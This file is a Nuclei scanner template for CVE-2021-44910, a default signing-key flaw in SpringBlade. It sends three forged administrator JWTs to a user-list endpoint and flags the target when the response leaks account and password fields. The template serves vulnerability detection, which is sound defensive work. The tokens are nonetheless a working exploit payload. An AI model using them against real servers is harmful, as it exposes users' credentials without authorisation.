45 lines
2.9 KiB
YAML
45 lines
2.9 KiB
YAML
id: CVE-2021-44910
|
|
|
|
info:
|
|
name: SpringBlade - Information Leakage
|
|
author: lbb
|
|
severity: high
|
|
description: |
|
|
SpringBlade is a comprehensive project upgraded and optimized from a commercial-grade project, featuring both a SpringCloud distributed microservice architecture and a SpringBoot monolithic microservice architecture. The SpringBlade framework has a default SIGN_KEY, which can be exploited by attackers to obtain sensitive information such as user account password logs.
|
|
reference:
|
|
- https://github.com/chillzhuang/blade-tool
|
|
tags: cve,cve2023,springblade,blade,info-leak
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /api/blade-user/user-list HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Blade-Auth: bearer {{bearer}}
|
|
|
|
payloads:
|
|
bearer:
|
|
- 'eyJhbGciOiJIUzM4NCIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODIxNzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.gbUWSdFfmzfU_gKzFYjyyJzcrHBfOwswJvptowNwNwfo12QilWudTMg-LbDAOPwk'
|
|
- 'eyJhbGciOiJIUzM4NCIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODIxNzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.gbUWSdFfmzfU_gKzFYjyyJzcrHBfOwswJvptowNwNwfo12QilWudTMg-LbDAOPwk'
|
|
- 'eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODIxNzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.kol9scDVwLDE8U3mM_j8O4UYrpdUc9_Zw935g7Nb979DfRuanai1UeKsK2zCKuR77Otryi0sGzBfGANDbLseBg'
|
|
|
|
stop-at-first-match: true
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"success":true'
|
|
- '"account":'
|
|
- '"password":'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- 'application/json'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100aefffb0b5617322128105734a342b759e51a979b8a308b29a95788bb1a174471022100e3b239f7c0fc2b9533ad5f1a7d0d622125496e0216a90fdbf24ddb57149cb7d1:922c64590222798bb761d5b6d8e72950 |